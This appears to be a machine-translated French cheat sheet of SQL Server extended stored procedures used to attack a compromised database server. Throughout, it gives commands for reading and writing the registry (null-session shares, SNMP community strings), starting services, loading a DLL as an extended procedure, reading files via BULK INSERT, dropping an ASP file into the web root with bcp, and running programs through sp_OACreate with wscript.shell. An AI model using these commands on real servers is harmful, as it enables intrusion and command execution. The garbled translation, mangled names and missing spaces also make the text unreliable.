Quelques extensions SQL
xp_regaddMulistring
xp_regdeletekey supprimer le nom de la clé
XP_RegdeleTevaluate Valeur clé
XP_REGENUMKEYS ENUM
XP_REGENUMVALUES
xp_regread pour
xp_regremovemulstring
xp_regwrite écriture
XP_AvailableMedia View Drive
RÉPERTOIRE DE VIEUX XP_DIRRTREE
Source de données XP_ENUMDSNODBC
xp_loginconfig Informations sur une configuration de sécurité du serveur
Package XP_MAKECAB, certaines autorisations DBO peuvent être utilisées en premier
XP_NTSEC_ENUMDOMAINS INFORMATIONS DE DOMAINE DE DOMAINE ENUM
xp_termine_process Process et IP
XP_Logininfo Actuellement du compte de connexion
sp_configure récupère le contenu dans la base de données (je pense que c'est très utile)
sp_helpextendproc obtient toutes les extensions de stockage
SP_WHO2 interroge les utilisateurs, l'hôte qu'ils se connectent, les opérations qu'ils effectuent dans la base de données, etc.
Certaines informations réseau
execxp_regreadhkey_local_machine,
«System / CurrentControlset / Services / LanManServer / Paramètres»,
'NullSessionshares'
Examen du réseau assisté SNMP
execxp_regenumvalueshkey_local_machine,
'System / CurrentControlset / Services / SNMP / Paramètres / ValidComm
Unités '
Démarrez certains services système, tels que Telnet, et vous pouvez venir à l'administrateur ou à certains mots de passe système.
execmaster..xp_serviceControl'start ',' calendrier '
execmaster..xp_serviceControl'start ',' Server '
Sp_addextendproc'xp_webserver ',' c: /temp/xp_foo.dll 'Cette extension peut exécuter le programme
Utilisez la syntaxe «Bulkinsert» pour insérer un fichier texte dans une table temporaire. Créez simplement ce tableau:
CreateTableFoo (linevarchar (8000))
Effectuez ensuite l'opération Bulkinsert pour insérer les données du fichier dans le tableau, telles que:
Bulkinsertfoofrom'c: /inetpub/wwwroot/admin/inc.asp '
BCP "SELECT * FRATTEXT..FOO" Queryoutc: /inetpub/wwwroot/runcommand.asp - c-slocalhost-usa - pfoobar
Le paramètre 's' est le serveur qui exécute la requête, le paramètre 'u' est le nom d'utilisateur, le paramètre 'P' est le mot de passe, voici 'Foobar'
Plusieurs procédures stockées intégrées sont fournies dans SQLServer qui permettent la création de scripts automatiques ActiveX. Ces scripts sont les mêmes que les scripts en cours d'exécution sous l'interprète de script Windows, ou les programmes de script ASP - ils utilisent VBScript ou JavaScript pour créer et interagir avec eux. Un script d'exécution automatique utilisant cette méthode peut faire n'importe quoi dans Transact-SQL dans les scripts ASP ou dans les scripts WSH.
Utilisez l'objet 'wscript.shell' pour créer une instance de bloc-notes:
déclarer @ oint
execsp_oacreate'wscript.shell ', @ oout
execsp_oamethod @ o, 'run', null, 'notepad.exe'
Spécifiez pour l'exécuter après le nom d'utilisateur: